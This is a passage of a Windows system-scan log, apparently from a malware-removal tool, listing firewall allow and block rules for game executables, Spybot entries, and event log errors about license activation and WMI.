FirewallRules: [{EA0D1741-86B9-4111-A53B-D44A614EC2CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{A81051AC-4649-42D9-B644-43E4ADEB4EC7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Prison Architect\Prison Architect Safe Mode.exe
FirewallRules: [{4ECF7C43-C7AC-41F1-AA43-78B4B7C00AA2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{2D1981B0-37C6-4A34-83FF-C25CDBFED6AB}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Kerbal Space Program\KSP_x64.exe
FirewallRules: [{750F14FD-12C1-459B-97AF-8045788F4A02}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [{BFCEA83A-D98F-4CE9-AF70-0BEB8A98845D}] => (Allow) C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe
FirewallRules: [TCP Query User{26F32E06-8C99-4C4E-A88C-110F0BC5DEB9}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [UDP Query User{C97AC77B-B9AB-4ACF-BD03-C9C9FD6606B1}D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll] => (Allow) D:\spel\hunted - the demon's forge\binaries\win32\p4dftre.dll
FirewallRules: [{638BA54D-2635-4759-BDFC-2D46474B6D37}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{E9B6E224-F758-479F-8277-959B1D50D0E5}] => (Allow) C:\Program Files (x86)\Tunngle\TnglCtrl.exe
FirewallRules: [{1FE04074-9729-4611-A59B-6D1AD71FD0C4}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{3280B250-6F0E-46DD-8C7B-3AEE07BD6DA7}] => (Allow) C:\Program Files (x86)\Tunngle\Tunngle.exe
FirewallRules: [{547FC444-5AC5-4171-8C2B-BC25DA6AD60F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{A70540E2-2F15-4B16-8EBF-9223237DB1D7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{B7FB3B81-9945-4456-AB4E-F3F462731DE7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{8D737F82-F9FE-4C2D-9234-9B6578374AE1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PARTICLEMACE\PARTICLEMACE_executable.exe
FirewallRules: [{281F067D-4520-4004-80F6-32A0E6089BD1}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\DeviceSetup.exe
FirewallRules: [{070E3BD2-A6A8-4891-97D6-A4D2D79B90ED}] => (Allow) LPort=5357
FirewallRules: [{BC6962E0-A9E1-45E9-8CF2-F4BA0CE26FFF}] => (Allow) C:\Program Files\HP\HP ENVY 4520 series\Bin\HPNetworkCommunicatorCom.exe
FirewallRules: [TCP Query User{5561F357-1028-459A-B796-A4D123A8600D}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [UDP Query User{12859DF5-D5D5-4025-B2F8-E39E76CBB2AA}D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe] => (Allow) D:\spel\divinity - original sin enhanced edition\shipping\eocapp.exe
FirewallRules: [TCP Query User{7EE8CDD9-35C7-430D-95D8-451C632D7DCF}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [UDP Query User{F311FB22-AA27-4EC6-8AE7-1D9691835D1C}D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe] => (Allow) D:\spel\cossacks anthology\cossacks - back to war\dmcr.exe
FirewallRules: [{33E129CF-48F9-46CD-BCC7-DD8BA14AF12D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{16831414-067E-45D0-A4D5-E68B529DB6D5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Overcooked\Overcooked.exe
FirewallRules: [{50A06F50-7F3D-4BDC-9021-237A4C0B2C27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [{1B14D338-DD94-4F52-AD5C-19A32CD5A7BC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Atlas Reactor\GlyphClient.exe
FirewallRules: [TCP Query User{4C44DD46-D7A9-4196-8296-EEC3056A05BA}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [UDP Query User{0E56461D-D37A-4C4F-A638-64AA8F253EF7}D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe] => (Block) D:\spel\everspace\rsg\binaries\win64\rsg-win64-shipping.exe
FirewallRules: [TCP Query User{7B48B31B-0302-4CA8-9E87-F07AB35F2D86}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [UDP Query User{0CAAB1E6-B8C4-4C54-8EED-E55C7FFDD98D}D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - galactic survival\empyrion.exe
FirewallRules: [{4EE9956F-18E1-400E-BF78-B16CA5740983}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{1F4F4B1F-6EB7-49F2-BEB5-C5D20017F534}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Dedicated Server\EmpyrionLauncher.exe
FirewallRules: [{4E13484E-599F-4A55-8783-90ECC346BE91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{EB02CC0B-C01C-4CF1-B865-43DD5B64DA66}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Empyrion - Galactic Survival\EmpyrionLauncher.exe
FirewallRules: [{56A01BA7-991A-4E71-996A-9DB735036A2A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [{164D6B17-3E23-4D7A-8EC8-9B92D2908A27}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot\lancealot.exe
FirewallRules: [VirtualPC-In-UDP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-UDP-2] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [VirtualPC-In-TCP-1] => (Allow) %SystemRoot%\System32\vpc.exe
FirewallRules: [TCP Query User{EAEAB11E-0749-492A-83F8-9E619C0825FB}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [UDP Query User{3A908214-3ACB-45F3-87BB-034C922C2A9D}D:\spel\company of heroes\bugreport\bugreport.exe] => (Block) D:\spel\company of heroes\bugreport\bugreport.exe
FirewallRules: [{BC279C92-F389-439A-AA3C-F8FC24E7E3E0}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{54C5FE03-560A-42F0-A953-CC57545F85F2}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{09DF48B2-2698-410B-B67C-DB382410B87B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [{89F025E4-A12F-4D64-8F4E-65A58D8FF1E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [TCP Query User{5A0AE274-1115-456E-8097-7259AE6A531D}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [UDP Query User{15BE3688-275A-40F9-8987-65CFDE79CC41}D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe] => (Allow) D:\spel\steam library\steamapps\common\empyrion - dedicated server\empyriondedicated.exe
FirewallRules: [{6A1EE22B-EFB5-403F-96B8-92BF6419D6D3}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{4F8E8B43-EDDE-423A-AFB4-558A6797AA1B}] => (Allow) C:\Program Files (x86)\qBittorrent\qbittorrent.exe
FirewallRules: [{587354FE-5AA4-40B2-8BE8-3F068F603006}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{2F20DB6C-39DB-42F5-B0EA-93724F169BF7}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Duck Game\DuckGame.exe
FirewallRules: [{CEE996FE-EC7E-4B5B-83A4-8D572D4710AC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{66553191-FBFE-4728-8CDE-F8A61645C7E4}] => (Allow) D:\Spel\Steam Library\SteamApps\common\TowerFall\TowerFall.exe
FirewallRules: [{BEC5AC23-37B2-40FD-8357-3AEC0079BE6C}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{D8EFC4A0-1905-4C93-9620-035D8AA25691}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Planet Coaster\PlanetCoaster.exe
FirewallRules: [{ACD083CA-B56C-4A63-AC29-54CF6A0CD632}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [{C888B48B-D53E-439A-AC80-145CA44D4737}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Samorost 3\Samorost3.exe
FirewallRules: [TCP Query User{E3430B03-1B85-4352-B782-0FA31716971E}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [UDP Query User{9283DBC8-33C0-43B5-9651-F441DC55A6DF}D:\spel\uplay library\forhonor\forhonor.exe] => (Allow) D:\spel\uplay library\forhonor\forhonor.exe
FirewallRules: [TCP Query User{105F511A-3CF6-48F6-AD6C-051E9FEF4601}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [UDP Query User{41437AF0-DE88-4AFA-A0CB-DAA1B25D218B}D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe] => (Block) D:\nedladdningar\orwell.episode.1-5\orwell.episode.1-5\orwell.exe
FirewallRules: [{90F7FC5D-4BDC-4E25-81CF-7F277BC7091B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{DBC3A232-DF3B-4592-AAD9-5AD7C9E8EF26}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Mainlining\MainliningGame.exe
FirewallRules: [{11C7801C-EA50-48C3-B975-C7808EBB34BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [{A402D5BB-ACD3-4564-8602-D1C3AFE8A5FC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\River City Ransom Underground\RCRU.exe
FirewallRules: [TCP Query User{90E2740D-4865-43C6-91D4-B44837FB7951}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [UDP Query User{91DD21ED-6B7D-4517-ABA8-25131C27A725}D:\spel\doom\doomx64.exe] => (Block) D:\spel\doom\doomx64.exe
FirewallRules: [{0E9497B1-EDF3-4BDA-84E8-C4AF819F2B1F}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [{DE8F4F0F-22D5-4E28-9D99-3E79A12D25D0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Depth\BETA\Binaries\Win32\DepthGame.exe
FirewallRules: [TCP Query User{392BB40D-09A3-46AE-B483-4A87F354BBE3}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [UDP Query User{02BF2D2B-EBEA-47F5-B4FA-A51CBA9A9C83}D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe] => (Allow) D:\spel\steam library\steamapps\common\projectzomboid\jre\bin\java.exe
FirewallRules: [TCP Query User{94065ED6-5B78-4044-AE30-8E49C3C21237}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [UDP Query User{27CA16C0-9AB9-4376-AE22-9AA13C815A01}D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe] => (Block) D:\user profile\desktop\gang.beasts.v0.5.6\gang beasts.exe
FirewallRules: [TCP Query User{FF88AE80-179E-4787-99D1-9D9601F0F888}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [UDP Query User{DE54AA93-CF4F-4466-966B-16CCAAB5E2AF}D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe] => (Allow) D:\spel\steam library\steamapps\common\pubg\tslgame\binaries\win64\tslgame.exe
FirewallRules: [{1A5EA0B5-372C-4636-865C-96EB70C2B9F8}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{0289A623-6B29-4123-AFAD-83CC04D6E3D1}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Dark Souls Prepare to Die Edition\DATA\DARKSOULS.exe
FirewallRules: [{094AA815-F657-443A-BD7D-E8BF39CB1875}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [{E6B49A1F-10BF-4C9D-939D-AF1B9D814811}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Awesomenauts\Beta\AwesomenautsLauncher.exe
FirewallRules: [TCP Query User{1B0D9DFE-155E-4872-9EA3-EB0B754A22E9}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [UDP Query User{9BB74597-A81A-4634-BF7E-27D90AAE1515}D:\spel\factorio_0.15.22\bin\x64\factorio.exe] => (Allow) D:\spel\factorio_0.15.22\bin\x64\factorio.exe
FirewallRules: [TCP Query User{A7B37CFC-0381-42BE-827A-63D6A4C34FC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [UDP Query User{639643C1-BDF4-477C-AD00-3FB55B221BC8}D:\spel\vikings - wolves of midgard\vikings.exe] => (Allow) D:\spel\vikings - wolves of midgard\vikings.exe
FirewallRules: [{2CAC80C4-1DD7-4ED9-AAC9-FA728E9C64C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [{59E06B2C-F0B8-4FD2-8C95-E33BA71B7A52}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\spacegame\Binaries\Win64\Fractured Space.exe
FirewallRules: [TCP Query User{49813E33-F982-4C58-AABE-7AE5DDBB53B7}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [UDP Query User{97BB371E-37DD-4871-A9B2-479DDB116DAB}D:\spel\gauntlet slayer edition\binaries\gauntlet.exe] => (Block) D:\spel\gauntlet slayer edition\binaries\gauntlet.exe
FirewallRules: [TCP Query User{AE8E1853-0B69-458C-A91B-357C96D672CA}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [UDP Query User{6309873B-0312-49FF-93AF-7FC0CEE92B2B}D:\spel\starcraft ii\versions\base56787\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base56787\sc2_x64.exe
FirewallRules: [TCP Query User{2B66DABB-08DB-4347-B883-42E57A1977E7}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [UDP Query User{B796F551-898A-414D-9130-087E8CDA4764}D:\spel\divinity original sin 2\bin\eocapp.exe] => (Block) D:\spel\divinity original sin 2\bin\eocapp.exe
FirewallRules: [{943F2851-ECFB-4B76-8DB5-790A4F3A2A60}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [{8C09611D-DED5-4A47-9CAD-6B5D30F07DEF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\PUBG\TslGame\Binaries\Win64\TslGame_BE.exe
FirewallRules: [TCP Query User{B57AE43D-9BD7-4625-9167-9682B1214B8E}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [UDP Query User{F54F1B03-C911-4118-898E-C4C6741ED54C}D:\spel\starcraft ii\versions\base57507\sc2_x64.exe] => (Allow) D:\spel\starcraft ii\versions\base57507\sc2_x64.exe
FirewallRules: [{A53DA5D6-B330-4B94-9BAD-CBFA322598D2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{0989A382-7FB7-49BD-8948-BB4D18E829E3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\BreachAndClear\bnc.exe
FirewallRules: [{86ECB8A3-9E4D-4BA6-8848-DF1BC1D6BD38}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{FB8EF655-CB2D-40B2-BC0A-EE99B096DB04}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Lance A Lot Enhanced Edition\lancealot.exe
FirewallRules: [{1AABF3A0-0D09-40C2-A9AA-0CB0D8D57BF0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [{D9690832-509B-45D6-9409-03836DE16213}] => (Allow) D:\Spel\Steam Library\SteamApps\common\HardWest\HardWest.exe
FirewallRules: [TCP Query User{4D4A7CFE-E3AD-42FE-9ABC-F15ACA432415}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [UDP Query User{B43EA068-17FF-4825-80F1-B7BEA12DBA14}D:\spel\satellite reign\satellitereignwindows.exe] => (Allow) D:\spel\satellite reign\satellitereignwindows.exe
FirewallRules: [{E12C1E12-8918-47BF-9BF0-BB81766D03BA}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [{A2AE5D14-6FD2-41C1-9980-F2E7E63537F2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aragami\Aragami.exe
FirewallRules: [TCP Query User{EAEA4C7A-39C4-439B-A5A3-BC1B39F3E633}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [UDP Query User{AE9B677E-82BF-4BD9-A500-9799B4349C4F}D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe] => (Block) D:\user profile\desktop\bombercrew\bombercrew\bombercrew.exe
FirewallRules: [{C07BD8B9-20CF-40B2-A390-051F5AF605EF}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [{7E02B52F-A3D5-4771-94A8-9E1BC9A92AE0}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Spintires MudRunner\MudRunner.exe
FirewallRules: [TCP Query User{0BC64E8E-D097-4302-8DE7-C52133F3F820}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{3F6D9C6D-0D88-42B3-A45B-22E3876F89E7}D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\nedladdningar\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{41295780-229B-4A41-8874-FA27D76D9D18}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{7FEB6C09-A3FC-4FE8-8C2F-A73DF3A26029}] => (Allow) D:\Spel\Steam Library\SteamApps\common\SecretPonchos\bin\SecretPonchosD3D11.exe
FirewallRules: [{AE43EF82-F6F7-4C66-9E0E-04BA99ADC5A3}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [{72A961A6-6F51-4295-8377-36F54B3EDD2D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\EvolveGame\Bin64_SteamRetail\Evolve.exe
FirewallRules: [TCP Query User{51297500-255C-4308-A33D-A59A0226532F}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [UDP Query User{C086CD1D-6E88-4B53-8234-63A7F7094C27}D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe] => (Allow) D:\spel\steam library\steamapps\common\aven colony\avencolony\binaries\win64\avencolony-win64-shipping.exe
FirewallRules: [{B0F4256D-3EB3-4DDB-9525-A5CC400DBC01}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{FD789251-9926-4417-AB50-A72ED2F1CCED}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{478551DD-BFAA-4D54-B66F-4825510EC57B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{E87E1A1E-46C6-4F95-A1E6-4CB2F188F244}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Aven Colony\AvenColony.exe
FirewallRules: [{4F8620B0-3C73-4A37-BE73-1E679DB228A9}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{830B508E-2878-4305-82C9-B9B9ADF9AD8D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Strikey Sisters\strikey_sisters.exe
FirewallRules: [{ACB155F9-DBDA-4D65-B643-959BE30D4175}] => (Allow) C:\Program Files\Vivaldi\Application\vivaldi.exe
FirewallRules: [TCP Query User{597DC14B-49DB-40B6-A24A-E3D9953A457D}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [UDP Query User{A9C2F1E3-849E-4D06-93ED-F0D6A0381D0A}D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe] => (Block) D:\spel\ultimate.chicken.horse.v1.3.281\ultimate.chicken.horse.v1.3.281\64 bit\ultimatechickenhorse.exe
FirewallRules: [{6E206845-F48F-4619-A3DA-A5516D9D4C5A}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{CE39CD5A-E51C-48D9-A1E7-2DA4AEF0C6CD}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Space\launcher\launcher.exe
FirewallRules: [{5D35B3A2-F05A-47E7-A169-9FB82F430BF5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{14725769-536B-4335-A537-4BBAD8646C91}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Launcher\DCConfig.exe
FirewallRules: [{2FFEA717-74A2-4877-89D2-B30E836B1AEE}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{9EC8F931-3B33-4C1E-8707-F3D9F5D2C37B}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Ancestors Legacy Beta\Anc\Binaries\Win64\Anc-Win64-Shipping.exe
FirewallRules: [{87FC258F-5BEE-4C60-9620-2854B57C3376}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [{6692C423-96D3-48B0-BE61-0A685AA7C369}] => (Allow) D:\Spel\Steam Library\SteamApps\common\rocketleague\Binaries\Win32\RocketLeague.exe
FirewallRules: [TCP Query User{746EE4C5-88A1-49CA-AE82-C024362EC325}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [UDP Query User{1CB765AF-56AD-4340-96E5-5AF7DDC35300}D:\spel\unreal tournament goty\system\unrealtournament.exe] => (Allow) D:\spel\unreal tournament goty\system\unrealtournament.exe
FirewallRules: [{6AA353F1-7DDF-490A-B825-0C9CF5C0597D}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{2253BB91-25A5-41A5-A8B1-51264D44C1DC}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{F128730D-D7BE-467C-A4BB-0C43215DC4C2}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{92BD8855-E433-4E7C-9DA1-BC4ADC152C43}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Don't Starve Together Beta\bin\dontstarve_steam.exe
FirewallRules: [{4DF2E569-34C8-428A-A8C6-689A8D3132A5}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{180A7648-B41B-49EC-9970-3A15A5246B34}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe
FirewallRules: [{CC32B82F-7235-40CF-890F-473BCA9F601D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{45300479-8F32-4A67-916B-F7D53A9DFB52}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{FB9D5CC2-2B07-4B7F-9F63-36452DB69316}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{5B525BF6-E027-4A85-98DB-0B69127E01F5}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HobLauncher.exe
FirewallRules: [{E8FF906C-0588-47BE-96E9-0BE363415543}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{986BA986-DD80-4802-9A0A-D9A8D1431284}] => (Allow) D:\Spel\Steam Library\SteamApps\common\Hob\HOB.exe
FirewallRules: [{CE43BA91-078E-4D0B-AB12-53C5C0B5839A}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe] => Enabled:Spybot - Search & Destroy tray access
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe] => Enabled:Spybot-S&D 2 Scanner Service
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe] => Enabled:Spybot-S&D 2 Updater
StandardProfile\AuthorizedApplications: [C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe] => Enabled:Spybot-S&D 2 Background update service

==================== Restore Points =========================

Could not list restore points
Check "winmgmt" service or repair WMI.


==================== Faulty Device Manager Devices =============

Could not list Devices. Check "winmgmt" service or repair WMI.


==================== Event log errors: =========================

Application errors:
==================
Error: (03/02/2018 11:13:40 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 11:12:18 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Event filter with query "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" could not be reactivated in namespace "//./root/CIMV2" because of error 0x80041003. Events cannot be delivered through this filter until the problem is corrected.

Error: (03/02/2018 11:12:13 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Windows license activation failed. Error 0x80070005.

Error: (03/02/2018 10:24:09 AM) (Source: WinMgmt) (EventID: 10) (User: )
